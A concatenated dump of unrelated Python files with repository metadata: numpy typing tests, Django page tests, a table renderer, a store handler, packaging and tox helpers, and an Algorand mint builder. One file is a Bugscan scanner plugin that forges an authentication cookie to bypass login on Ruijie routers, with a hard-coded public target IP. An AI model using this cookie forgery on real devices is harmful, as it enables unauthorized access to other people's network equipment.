] | 1 | 2022-01-08T12:30:44.000Z | 2022-01-08T12:30:44.000Z | Python_OCR_JE/venv/Lib/site-packages/numpy/typing/tests/data/pass/fromnumeric.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | Python_OCR_JE/venv/Lib/site-packages/numpy/typing/tests/data/pass/fromnumeric.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | 1 | 2021-04-26T22:41:56.000Z | 2021-04-26T22:41:56.000Z | """Tests for :mod:`numpy.core.fromnumeric`."""
import numpy as np
A = np.array(True, ndmin=2, dtype=bool)
B = np.array(1.0, ndmin=2, dtype=np.float32)
A.setflags(write=False)
B.setflags(write=False)
a = np.bool_(True)
b = np.float32(1.0)
c = 1.0
d = np.array(1.0, dtype=np.float32) # writeable
np.take(a, 0)
np.take(b, 0)
np.take(c, 0)
np.take(A, 0)
np.take(B, 0)
np.take(A, [0])
np.take(B, [0])
np.reshape(a, 1)
np.reshape(b, 1)
np.reshape(c, 1)
np.reshape(A, 1)
np.reshape(B, 1)
np.choose(a, [True, True])
np.choose(A, [1.0, 1.0])
np.repeat(a, 1)
np.repeat(b, 1)
np.repeat(c, 1)
np.repeat(A, 1)
np.repeat(B, 1)
np.swapaxes(A, 0, 0)
np.swapaxes(B, 0, 0)
np.transpose(a)
np.transpose(b)
np.transpose(c)
np.transpose(A)
np.transpose(B)
np.partition(a, 0, axis=None)
np.partition(b, 0, axis=None)
np.partition(c, 0, axis=None)
np.partition(A, 0)
np.partition(B, 0)
np.argpartition(a, 0)
np.argpartition(b, 0)
np.argpartition(c, 0)
np.argpartition(A, 0)
np.argpartition(B, 0)
np.sort(A, 0)
np.sort(B, 0)
np.argsort(A, 0)
np.argsort(B, 0)
np.argmax(A)
np.argmax(B)
np.argmax(A, axis=0)
np.argmax(B, axis=0)
np.argmin(A)
np.argmin(B)
np.argmin(A, axis=0)
np.argmin(B, axis=0)
np.searchsorted(A[0], 0)
np.searchsorted(B[0], 0)
np.searchsorted(A[0], [0])
np.searchsorted(B[0], [0])
np.resize(a, (5, 5))
np.resize(b, (5, 5))
np.resize(c, (5, 5))
np.resize(A, (5, 5))
np.resize(B, (5, 5))
np.squeeze(a)
np.squeeze(b)
np.squeeze(c)
np.squeeze(A)
np.squeeze(B)
np.diagonal(A)
np.diagonal(B)
np.trace(A)
np.trace(B)
np.ravel(a)
np.ravel(b)
np.ravel(c)
np.ravel(A)
np.ravel(B)
np.nonzero(A)
np.nonzero(B)
np.shape(a)
np.shape(b)
np.shape(c)
np.shape(A)
np.shape(B)
np.compress([True], a)
np.compress([True], b)
np.compress([True], c)
np.compress([True], A)
np.compress([True], B)
np.clip(a, 0, 1.0)
np.clip(b, -1, 1)
np.clip(a, 0, None)
np.clip(b, None, 1)
np.clip(c, 0, 1)
np.clip(A, 0, 1)
np.clip(B, 0, 1)
np.clip(B, [0, 1], [1, 2])
np.sum(a)
np.sum(b)
np.sum(c)
np.sum(A)
np.sum(B)
np.sum(A, axis=0)
np.sum(B, axis=0)
np.all(a)
np.all(b)
np.all(c)
np.all(A)
np.all(B)
np.all(A, axis=0)
np.all(B, axis=0)
np.all(A, keepdims=True)
np.all(B, keepdims=True)
np.any(a)
np.any(b)
np.any(c)
np.any(A)
np.any(B)
np.any(A, axis=0)
np.any(B, axis=0)
np.any(A, keepdims=True)
np.any(B, keepdims=True)
np.cumsum(a)
np.cumsum(b)
np.cumsum(c)
np.cumsum(A)
np.cumsum(B)
np.ptp(b)
np.ptp(c)
np.ptp(B)
np.ptp(B, axis=0)
np.ptp(B, keepdims=True)
np.amax(a)
np.amax(b)
np.amax(c)
np.amax(A)
np.amax(B)
np.amax(A, axis=0)
np.amax(B, axis=0)
np.amax(A, keepdims=True)
np.amax(B, keepdims=True)
np.amin(a)
np.amin(b)
np.amin(c)
np.amin(A)
np.amin(B)
np.amin(A, axis=0)
np.amin(B, axis=0)
np.amin(A, keepdims=True)
np.amin(B, keepdims=True)
np.prod(a)
np.prod(b)
np.prod(c)
np.prod(A)
np.prod(B)
np.prod(a, dtype=None)
np.prod(A, dtype=None)
np.prod(A, axis=0)
np.prod(B, axis=0)
np.prod(A, keepdims=True)
np.prod(B, keepdims=True)
np.prod(b, out=d)
np.prod(B, out=d)
np.cumprod(a)
np.cumprod(b)
np.cumprod(c)
np.cumprod(A)
np.cumprod(B)
np.ndim(a)
np.ndim(b)
np.ndim(c)
np.ndim(A)
np.ndim(B)
np.size(a)
np.size(b)
np.size(c)
np.size(A)
np.size(B)
np.around(a)
np.around(b)
np.around(c)
np.around(A)
np.around(B)
np.mean(a)
np.mean(b)
np.mean(c)
np.mean(A)
np.mean(B)
np.mean(A, axis=0)
np.mean(B, axis=0)
np.mean(A, keepdims=True)
np.mean(B, keepdims=True)
np.mean(b, out=d)
np.mean(B, out=d)
np.std(a)
np.std(b)
np.std(c)
np.std(A)
np.std(B)
np.std(A, axis=0)
np.std(B, axis=0)
np.std(A, keepdims=True)
np.std(B, keepdims=True)
np.std(b, out=d)
np.std(B, out=d)
np.var(a)
np.var(b)
np.var(c)
np.var(A)
np.var(B)
np.var(A, axis=0)
np.var(B, axis=0)
np.var(A, keepdims=True)
np.var(B, keepdims=True)
np.var(b, out=d)
np.var(B, out=d)
| 15.333333 | 49 | 0.601949 | 876 | 4,002 | 2.748858 | 0.077626 | 0.061047 | 0.06686 | 0.039867 | 0.608804 | 0.501246 | 0.467193 | 0.31603 | 0.165282 | 0.101329 | 0 | 0.033954 | 0.168416 | 4,002 | 260 | 50 | 15.392308 | 0.689603 | 0.012744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004566 | 0 | 0.004566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5b982315dc9d3757badb58ec19ad64ecbb9cf6 | 871 | py | Python | Bugscan_exploits-master/exp_list/exp-1799.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-1799.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-1799.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/python
#-*- encoding:utf-8 -*-
#title: Ruijie router cookie deception
#author: xx00
#ref: http://www.wooyun.org/bugs/wooyun-2010-0148657
import urlparse
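# `curl` and `security_hole` below are not imported here: the Bugscan
# scanner runtime injects them as globals (the `from dummy import *` in
# __main__ supplies stand-ins for local runs).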
def assign(service, arg):
if service == 'ruijie_router':
arr = urlparse.urlparse(arg)
return True, '%s://%s/' % (arr.scheme, arr.netloc)
def audit(arg):
url = arg + 'stability.htm'
cookie = 'currentURL=index; auth=bWFuYWdlcjptYW5hZ2Vy; user=manager; c_name='
code, head, res, errcode, _ = curl.curl2(url,cookie=cookie,proxy=('127.0.0.1',8080))
if code == 200 and 'A_INTFEMPTY' in res and 'selectInterface' in res:
security_hole('Cookie deception:http://www.wooyun.org/bugs/wooyun-2010-0148657 cookie:%s'%cookie)
if __name__ == '__main__':
from dummy import *
audit(assign('ruijie_router', 'http://116.113.16.146/')[1]) | 32.259259 | 106 | 0.652124 | 119 | 871 | 4.647059 | 0.647059 | 0.025316 | 0.047016 | 0.057866 | 0.133816 | 0.133816 | 0.133816 | 0.133816 | 0 | 0 | 0 | 0.074543 | 0.183697 | 871 | 27 | 107 | 32.259259 | 0.703235 | 0.161883 | 0 | 0 | 0 | 0.071429 | 0.358571 | 0.037143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5be020af94bab9e82de5a99d0b4ee436cb2749 | 2,716 | py | Python | core/tests/test_models.py | kaedroho/dit-directory-cms | 67c15eeed19e7b3583f1fce1969230ddf83b6813 | [
"MIT"
] | null | null | null | core/tests/test_models.py | kaedroho/dit-directory-cms | 67c15eeed19e7b3583f1fce1969230ddf83b6813 | [
"MIT"
] | null | null | null | core/tests/test_models.py | kaedroho/dit-directory-cms | 67c15eeed19e7b3583f1fce1969230ddf83b6813 | [
"MIT"
] | null | null | null | import pytest
from django.conf import settings
from django.core.exceptions import ValidationError
from django.utils import translation
from wagtail.core.models import Page
from find_a_supplier.tests.factories import IndustryPageFactory
from invest.tests.factories import InvestAppFactory, \
SectorLandingPageFactory, SectorPageFactory
from invest.models import InvestApp
@pytest.mark.django_db
def test_slugs_are_unique_in_the_same_service():
IndustryPageFactory(slug='foo')
with pytest.raises(ValidationError) as excinfo:
IndustryPageFactory(slug='foo')
assert 'This slug is already in use' in str(excinfo.value)
@pytest.mark.django_db
def test_slugs_are_not_unique_across_services(root_page):
page_one = IndustryPageFactory(slug='foo', parent=root_page)
page_two = SectorPageFactory(slug='foo', parent=root_page)
assert page_one.slug == 'foo'
assert page_two.slug == 'foo'
@pytest.mark.django_db
def test_delete_same_slug_different_services(root_page):
"""
Deleting a page results in ancestor pages being re-saved.
    Thus the ancestor page (root_page) has to have a title.
"""
root_page.title = 'ancestor page has to have a title'
root_page.save()
page_one = IndustryPageFactory(slug='foo', parent=root_page)
page_two = SectorPageFactory(slug='foo', parent=root_page)
assert page_one.slug == 'foo'
assert page_two.slug == 'foo'
page_one.delete()
assert Page.objects.filter(pk=page_one.pk).exists() is False
@pytest.mark.django_db
def test_page_path(root_page):
page_one = SectorLandingPageFactory(parent=root_page)
page_two = SectorPageFactory(slug='foo', parent=page_one)
page_three = SectorPageFactory(slug='bar', parent=page_two)
assert page_three.full_path == '/industries/foo/bar/'
assert page_two.full_path == '/industries/foo/'
@pytest.mark.django_db
def test_base_model_check_valid_draft_token(page):
draft_token = page.get_draft_token()
assert page.is_draft_token_valid(draft_token) is True
@pytest.mark.django_db
def test_base_model_check_invalid_draft_token(page):
assert page.is_draft_token_valid('asdf') is False
@pytest.mark.django_db
def test_base_model_sets_service_name_on_save(page):
assert page.service_name == page.service_name_value
@pytest.mark.django_db
def test_base_model_redirect_published_url(rf, page):
request = rf.get('/')
response = page.serve(request)
assert response.status_code == 302
assert response.url == page.get_url()
@pytest.mark.django_db
def test_base_app_slugs_are_created_in_all_languages(root_page):
app = InvestAppFactory(title='foo', parent=root_page)
assert app.slug == InvestApp.slug_identity
| 31.218391 | 64 | 0.768778 | 387 | 2,716 | 5.108527 | 0.281654 | 0.052605 | 0.072838 | 0.081942 | 0.35913 | 0.347496 | 0.320182 | 0.286292 | 0.198786 | 0.133536 | 0 | 0.00128 | 0.136966 | 2,716 | 86 | 65 | 31.581395 | 0.84215 | 0.042342 | 0 | 0.327586 | 0 | 0 | 0.054243 | 0 | 0 | 0 | 0 | 0 | 0.241379 | 1 | 0.155172 | false | 0 | 0.137931 | 0 | 0.293103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5c62e88857a20ae95ab8ff976f6b9308f5cbf7 | 1,315 | py | Python | htmldatatables/__init__.py | juhajokela/htmldatatables | 298467e6256fc1c1c16c0af9f1d2de8782935715 | [
"MIT"
] | null | null | null | htmldatatables/__init__.py | juhajokela/htmldatatables | 298467e6256fc1c1c16c0af9f1d2de8782935715 | [
"MIT"
] | null | null | null | htmldatatables/__init__.py | juhajokela/htmldatatables | 298467e6256fc1c1c16c0af9f1d2de8782935715 | [
"MIT"
] | null | null | null | import os
from collections.abc import Iterable
DIRECTORY = os.path.dirname(os.path.realpath(__file__))
TEMPLATES = os.path.join(DIRECTORY, 'templates')
def load_template(path):
with open(os.path.join(TEMPLATES, path)) as f:
return f.read()
def render_html(template, table):
return template.replace('{{table}}', table)
def generate_html_table(data):
def generate_header_row(obj):
cells = ''.join(f'<th>{x}</th>' for x in obj.keys())
return f'<thead><tr>{cells}</tr></thead>'
def generate_data_row(obj):
cells = ''.join(f'<td>{x}</td>' for x in obj.values())
return f'<tr>{cells}</tr>'
    assert isinstance(data, Iterable), 'data is not iterable'
    # materialise first: next(iter(data)) would silently drop the first row
    # when data is a generator
    data = list(data)
    assert len(data) > 0, 'data is empty'
    obj = data[0]
    assert isinstance(obj, dict), 'data object is not dictionary'
table = '<table id="table">'
table += generate_header_row(obj)
table += '<tbody>'
for obj in data:
table += generate_data_row(obj)
table += '</tbody>'
return table + '</table>'
HTMLTABLE = load_template('htmltable.html')
DATATABLES = load_template('datatables.html')
def render_table(data, datatables=False):
html_table = generate_html_table(data)
if not datatables:
return render_html(HTMLTABLE, html_table)
return render_html(DATATABLES, html_table)
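# Usage sketch (illustrative data, not part of the package):
#     html = render_table([{"name": "ada", "score": 5}], datatables=True)
#     with open("out.html", "w") as f:
#         f.write(html)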
| 26.3 | 65 | 0.661597 | 179 | 1,315 | 4.715084 | 0.312849 | 0.053318 | 0.023697 | 0.049763 | 0.037915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190875 | 1,315 | 49 | 66 | 26.836735 | 0.793233 | 0 | 0 | 0 | 0 | 0 | 0.158175 | 0.023574 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.181818 | false | 0 | 0.060606 | 0.030303 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5d14417de1e8123f6427664b0bb96e2cca8f09 | 1,562 | py | Python | bitcoinstore/api/handlers/put_non_fungible.py | 0x1a8008/bitcoin-store | 7a490d81de4e874e6e455b62b406ba9059c1fb55 | [
"MIT"
] | null | null | null | bitcoinstore/api/handlers/put_non_fungible.py | 0x1a8008/bitcoin-store | 7a490d81de4e874e6e455b62b406ba9059c1fb55 | [
"MIT"
] | null | null | null | bitcoinstore/api/handlers/put_non_fungible.py | 0x1a8008/bitcoin-store | 7a490d81de4e874e6e455b62b406ba9059c1fb55 | [
"MIT"
] | null | null | null | """
Handles the validation and loading of a non-fungible item and its associated
parent type to the db.
"""
from bitcoinstore.extensions import db
from bitcoinstore.api.models.NonFungibleItem import NonFungibleItem
from bitcoinstore.api.models.NonFungibleType import NonFungibleType
def put_non_fungible(sku, sn, properties) -> dict:
try:
type = db.session.query(NonFungibleType).get(sku)
        if not type:  # SKU type does not exist, create one
            type = NonFungibleType(sku, properties)
else:
type.update(properties)
item = db.session.query(NonFungibleItem).get(sn)
if not item: # SN item does not exist, create one
item = NonFungibleItem(sn, properties)
item.sku = sku
else:
item.update(properties)
db.session.add(type)
db.session.add(item)
db.session.commit()
item_summary = item.get_summary()
type_summary = type.get_summary()
return {
"sn": item_summary['sn'],
"color": item_summary['color'],
"description": type_summary['description'],
"notes": item_summary['notes'],
"price_cents": item_summary['price_cents'],
"reserved": item_summary['reserved'],
"shipping_weight_grams": type_summary['shipping_weight_grams'],
"sku": item_summary['sku'],
"sold": item_summary['sold']
}
except Exception as e:
print(e)
return {}
| 29.471698 | 76 | 0.608195 | 174 | 1,562 | 5.33908 | 0.350575 | 0.094726 | 0.038751 | 0.053821 | 0.101184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.286172 | 1,562 | 52 | 77 | 30.038462 | 0.833184 | 0.109475 | 0 | 0.111111 | 0 | 0 | 0.101302 | 0.030391 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.083333 | 0 | 0.166667 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5f2416c3d993516e7f533b137098736ce6b338 | 1,565 | py | Python | setup.py | sysid/kneed | f5a22df8281e00c62f9ee7c947b62a8aaa07f8be | [
"BSD-3-Clause"
] | 1 | 2021-10-03T07:33:34.000Z | 2021-10-03T07:33:34.000Z | setup.py | deysn/kneed | d7b75a184a86e4ac146acee09ed61d42554b048b | [
"BSD-3-Clause"
] | null | null | null | setup.py | deysn/kneed | d7b75a184a86e4ac146acee09ed61d42554b048b | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, find_packages
from codecs import open as copen
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with copen(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
with copen(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if 'git+' not in x]
dependency_links = [
x.strip().replace('git+', '') for x in all_reqs if x.startswith('git+')
]
version = {}
with open("kneed/version.py") as fp:
exec(fp.read(), version)
setup(
name='kneed',
version=version['__version__'],
description='Knee-point detection in Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/arvkevi/kneed',
download_url='https://github.com/arvkevi/kneed/tarball/' + version['__version__'],
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Information Analysis',
'Programming Language :: Python :: 3',
],
keywords='knee-detection system',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='Kevin Arvai',
install_requires=install_requires,
tests_requires=['pytest'],
dependency_links=dependency_links,
author_email='arvkevi@gmail.com',
)
| 31.938776 | 86 | 0.688818 | 201 | 1,565 | 5.19403 | 0.522388 | 0.071839 | 0.024904 | 0.032567 | 0.153257 | 0.084291 | 0 | 0 | 0 | 0 | 0 | 0.003067 | 0.166773 | 1,565 | 48 | 87 | 32.604167 | 0.797546 | 0.050479 | 0 | 0 | 0 | 0 | 0.29265 | 0.014835 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6219cbe0277768d92d5d74c2d4bb86b688c418 | 1,808 | py | Python | src/tox_ansible/tox_lint_case.py | greg-hellings/tox-ansible-collection | 174ade3a634ce21c757e5e0efa1d5fbc8e0ede72 | [
"MIT"
] | null | null | null | src/tox_ansible/tox_lint_case.py | greg-hellings/tox-ansible-collection | 174ade3a634ce21c757e5e0efa1d5fbc8e0ede72 | [
"MIT"
] | null | null | null | src/tox_ansible/tox_lint_case.py | greg-hellings/tox-ansible-collection | 174ade3a634ce21c757e5e0efa1d5fbc8e0ede72 | [
"MIT"
] | null | null | null | from copy import copy
from pathlib import Path
from .tox_base_case import ToxBaseCase
from .tox_helper import Tox
BASH = "cd {} && molecule {} lint -s {}"
class ToxLintCase(ToxBaseCase):
description = "Auto-generated lint for ansible cases"
def __init__(self, cases, name_parts=None):
self._cases = copy(cases)
self._name_parts = name_parts or []
self._config = Tox()
super().__init__()
def get_commands(self, options):
if self.is_precommit:
cmds = [["pre-commit", "run", "--all"]]
else:
cmds = []
# Construct the ansible-lint command
ansible_lint = ["ansible-lint", "-R"]
if options.ansible_lint:
ansible_lint.append("-c")
ansible_lint.append(options.ansible_lint)
cmds.append(ansible_lint)
# Construct the yamllint command
if options.yamllint:
yamllint = ["yamllint", "-c", options.yamllint, "."]
cmds.append(yamllint)
# Construct the flake8 invocation
flake8 = ["flake8", "."]
cmds.append(flake8)
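        # With no pre-commit config and no ansible-lint/yamllint configs this
        # returns, for example: [["ansible-lint", "-R"], ["flake8", "."]]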
return cmds
@property
def is_precommit(self) -> bool:
"""Determines if this repository is configured to use pre-commit
or not."""
p = Path(self.working_dir) / ".pre-commit-config.yaml"
return p.exists()
@property
def working_dir(self):
return self._config.toxinidir
@property
def dependencies(self):
if self.is_precommit:
deps = set(["pre-commit"])
else:
deps = set(["flake8", "ansible-lint", "yamllint", "ansible"])
return deps
def get_name(self, fmt=""):
return "-".join(self._name_parts + ["lint_all"])
| 28.25 | 73 | 0.57135 | 199 | 1,808 | 5.020101 | 0.371859 | 0.099099 | 0.026026 | 0.034034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004003 | 0.309181 | 1,808 | 63 | 74 | 28.698413 | 0.795837 | 0.09292 | 0 | 0.159091 | 0 | 0 | 0.120074 | 0.014163 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.090909 | 0.045455 | 0.386364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df63b5b68fd38bb5792b3f99329d5814e6454f21 | 3,498 | py | Python | simplads/simplad_monad/simplad_base_helper.py | Cogmob/simplads | 8731c4a02273109187cfe601058ce797e32ba1ae | [
"MIT"
] | null | null | null | simplads/simplad_monad/simplad_base_helper.py | Cogmob/simplads | 8731c4a02273109187cfe601058ce797e32ba1ae | [
"MIT"
] | null | null | null | simplads/simplad_monad/simplad_base_helper.py | Cogmob/simplads | 8731c4a02273109187cfe601058ce797e32ba1ae | [
"MIT"
] | null | null | null | from .delta_type import DeltaType
from .namedtuples.bind_args import BindArgs
from .namedtuples.bound import Bound
from .simplad_base import SimpladBase
from .simplad_monad import WrappedDelta
import abc
from functools import reduce
'''
bind process
input
(~bound~, [])
extract unbound and annotation from ~bound~
call bind until lowest layer
call box
input
([higher deltas, ..], unbound) bind
call function
input
unbound
returned (value, {deltas: delta, ...})
bind up
returned (unbound, [(is_default, delta), ...])
returned (bound, [])
'''
class SimpladBaseHelper(SimpladBase):
@abc.abstractmethod
    def apply_delta(annotation, delta, unbound):
        ''' returns (annotation, overwrite_unbound) '''
        return
@abc.abstractmethod
def initial_annotation(unbound):
''' returns the initial annotation '''
return
@abc.abstractmethod
def merge_deltas(a, b):
''' returns WrappedDelta '''
return
@classmethod
# returns (unbound,annotation), higher_deltas
def bind(cls, func):
def lam(i):
higher_deltas = i.deltas
higher_deltas.append(
WrappedDelta(type=DeltaType.default, delta=None))
res = cls.run(
func, i.bound.annotation, i.bound.unbound, higher_deltas)
unbound = res.bound
higher_deltas = res.deltas
wrapped_delta = cls.merge_r(higher_deltas.pop())
delta_type = wrapped_delta.type
if delta_type is DeltaType.finish:
return BindArgs(bound=unbound, deltas=higher_deltas)
if delta_type is DeltaType.default:
return BindArgs(bound=Bound(unbound=unbound, annotation=i.bound.annotation),
deltas=higher_deltas)
if delta_type is not DeltaType.configured:
raise TypeError('unknown delta type')
annotation, overwrite_unbound = cls.apply_delta(
i.bound.annotation,
wrapped_delta.delta,
unbound)
if overwrite_unbound.overwrite is True:
unbound = overwrite_unbound.new_value
return BindArgs(
bound=Bound(unbound=unbound, annotation=annotation),
deltas=higher_deltas)
return lam
@classmethod
# returns value, annotation
def unit(cls, func):
def ret(i):
applied = func(i)
return Bound(unbound=applied,
annotation=cls.initial_annotation(applied))
return ret
@classmethod
# return [unbound, higher_deltas]
def run(cls, func, annotation_before, unbound, higher_deltas):
return func(BindArgs(bound=unbound, deltas=higher_deltas))
@classmethod
# returns WrappedDelta
def merge_r(cls, wrapped_delta):
if (wrapped_delta.type is not DeltaType.list):
return wrapped_delta
sub_deltas = [cls.merge_r(d) for d in wrapped_delta.delta]
return reduce(
lambda acc, d: cls.merge_deltas_wrap(acc, d),
sub_deltas[1:],
sub_deltas[0])
@classmethod
# returns WrappedDelta
def merge_deltas_wrap(cls, a, b):
if a.type is b.type is DeltaType.finish:
return a
if a.type is b.type is DeltaType.default:
return a
return WrappedDelta(
type=DeltaType.configured,
delta=cls.merge_deltas(a.delta, b.delta))
| 30.417391 | 92 | 0.609777 | 384 | 3,498 | 5.427083 | 0.221354 | 0.074856 | 0.043186 | 0.018714 | 0.216891 | 0.127639 | 0.099808 | 0.023992 | 0 | 0 | 0 | 0.000824 | 0.306461 | 3,498 | 114 | 93 | 30.684211 | 0.858203 | 0.06518 | 0 | 0.205479 | 0 | 0 | 0.006205 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136986 | false | 0 | 0.082192 | 0.013699 | 0.438356 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df659d906d53b0c61e9d3171a0f7de7260a4b059 | 3,381 | py | Python | algofi/v1/mint.py | zhengxunWu3/algofi-py-sdk | 8388d71d55eae583ac3579286b5f870aa3db2913 | [
"MIT"
] | 38 | 2021-12-30T02:32:57.000Z | 2022-03-23T22:09:16.000Z | algofi/v1/mint.py | zhengxunWu3/algofi-py-sdk | 8388d71d55eae583ac3579286b5f870aa3db2913 | [
"MIT"
] | 4 | 2021-11-03T00:14:46.000Z | 2022-03-28T02:17:33.000Z | algofi/v1/mint.py | zhengxunWu3/algofi-py-sdk | 8388d71d55eae583ac3579286b5f870aa3db2913 | [
"MIT"
] | 8 | 2021-12-15T05:29:55.000Z | 2022-02-08T03:45:11.000Z |
from algosdk.future.transaction import ApplicationNoOpTxn, PaymentTxn, AssetTransferTxn
from .prepend import get_init_txns
from ..utils import Transactions, TransactionGroup
from ..contract_strings import algofi_manager_strings as manager_strings
def prepare_mint_transactions(sender, suggested_params, storage_account, amount, bank_asset_id, manager_app_id, market_app_id, market_address, supported_market_app_ids, supported_oracle_app_ids, asset_id=None):
"""Returns a :class:`TransactionGroup` object representing a mint group
transaction against the algofi protocol. bAssets are not automatically
posted to collateral as in `prepare_mint_to_collateral_transactions`.
Sender sends assets to the account of the asset market application which
then sends an amount of market bank assets to the user.
:param sender: account address for the sender
:type sender: string
:param suggested_params: suggested transaction params
:type suggested_params: :class:`algosdk.future.transaction.SuggestedParams` object
:param storage_account: storage account address for sender
:type storage_account: string
:param amount: amount of asset to supply for minting bank assets
:type amount: int
:param bank_asset_id: asset id of the bank asset to be minted
:type bank_asset_id: int
:param manager_app_id: id of the manager application
:type manager_app_id: int
:param market_app_id: id of the market application for the bank asset
:type market_app_id: int
:param market_address: account address for the market application
:type market_address: string
:param supported_market_app_ids: list of supported market application ids
:type supported_market_app_ids: list
:param supported_oracle_app_ids: list of supported oracle application ids
:type supported_oracle_app_ids: list
:param asset_id: asset id of the asset being supplied, defaults to None (algo)
:type asset_id: int, optional
:return: :class:`TransactionGroup` object representing a mint group transaction
:rtype: :class:`TransactionGroup`
"""
prefix_transactions = get_init_txns(
transaction_type=Transactions.MINT,
sender=sender,
suggested_params=suggested_params,
manager_app_id=manager_app_id,
supported_market_app_ids=supported_market_app_ids,
supported_oracle_app_ids=supported_oracle_app_ids,
storage_account=storage_account
)
txn0 = ApplicationNoOpTxn(
sender=sender,
sp=suggested_params,
index=manager_app_id,
app_args=[manager_strings.mint.encode()]
)
txn1 = ApplicationNoOpTxn(
sender=sender,
sp=suggested_params,
index=market_app_id,
app_args=[manager_strings.mint.encode()],
foreign_apps=[manager_app_id],
foreign_assets=[bank_asset_id],
accounts=[storage_account]
)
if asset_id:
txn2 = AssetTransferTxn(
sender=sender,
sp=suggested_params,
receiver=market_address,
amt=amount,
index=asset_id
)
else:
txn2 = PaymentTxn(
sender=sender,
sp=suggested_params,
receiver=market_address,
amt=amount
)
txn_group = TransactionGroup(prefix_transactions + [txn0, txn1, txn2])
